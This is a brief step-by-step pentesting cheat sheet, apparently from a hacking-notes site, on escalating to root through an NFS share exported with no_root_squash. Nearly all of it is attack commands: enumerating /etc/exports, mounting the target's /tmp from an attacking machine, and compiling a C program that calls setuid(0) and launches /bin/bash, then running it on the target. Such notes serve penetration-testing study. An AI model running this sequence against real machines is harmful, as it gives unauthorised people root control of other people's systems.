NFS Root Squashing

Enumeration

  • cat /etc/exports in our example the "no root squash is defined for the tmp export. The folder is sharable and can be mounted image

Exploitation

In our attacking machine

  • showmount -e IP-OF-TARGET list the mountable folder of our target image

  • mkdir /tmp/1

  • mount -o rw,vers=2 10.10.32.193:/tmp /tmp/1 we mount our folder

  • echo 'int main() { setgid(0); setuid(0); system("/bin/bash"); return 0; }' > /tmp/1/x.c

  • gcc /tmp/1/x.c -o /tmp/1/x image

In our target

  • /tmp/x we can execute our binary

  • We should be root! image

Last updated